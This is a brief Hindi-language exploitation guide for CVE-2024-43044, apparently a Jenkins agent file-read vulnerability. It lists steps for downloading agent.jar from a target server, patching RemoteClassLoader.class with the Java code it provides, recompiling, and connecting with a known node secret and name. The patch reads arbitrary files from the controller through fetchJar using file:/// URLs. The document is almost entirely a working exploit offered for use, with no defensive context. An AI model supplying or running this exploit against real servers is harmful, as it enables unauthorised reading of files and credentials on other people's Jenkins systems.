
CVE-2024-43044 के शोषण की विधि
http://ip:port/jnlpJars/agent.jar के माध्यम से jar पैकेज डाउनलोड करें
\hudson\remoting\RemoteClassLoader.class के संबंधित कोड को संशोधित करें

पुनः संकलित करें और पैकेज करें
node की गुप्त कुंजी और नाम पहले से जानना आवश्यक है

java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>
जोड़ने के लिए सामग्री:
import java.util.Scanner;
try {
Scanner scanner = new Scanner(System.in);
System.out.print("输入读取文件path:");
String inputText = scanner.nextLine();
System.out.println("尝试读取:" + inputText);
URL jarFileUrl = new URL("file:///" + inputText);
byte[] fileContent = this.proxy.fetchJar(jarFileUrl);
String contentAsString = new String(fileContent, StandardCharsets.UTF_8);
System.out.println("文件内容:\n" + contentAsString);
} catch (Exception var10) {
System.out.println("WRONG:" + var10);
}
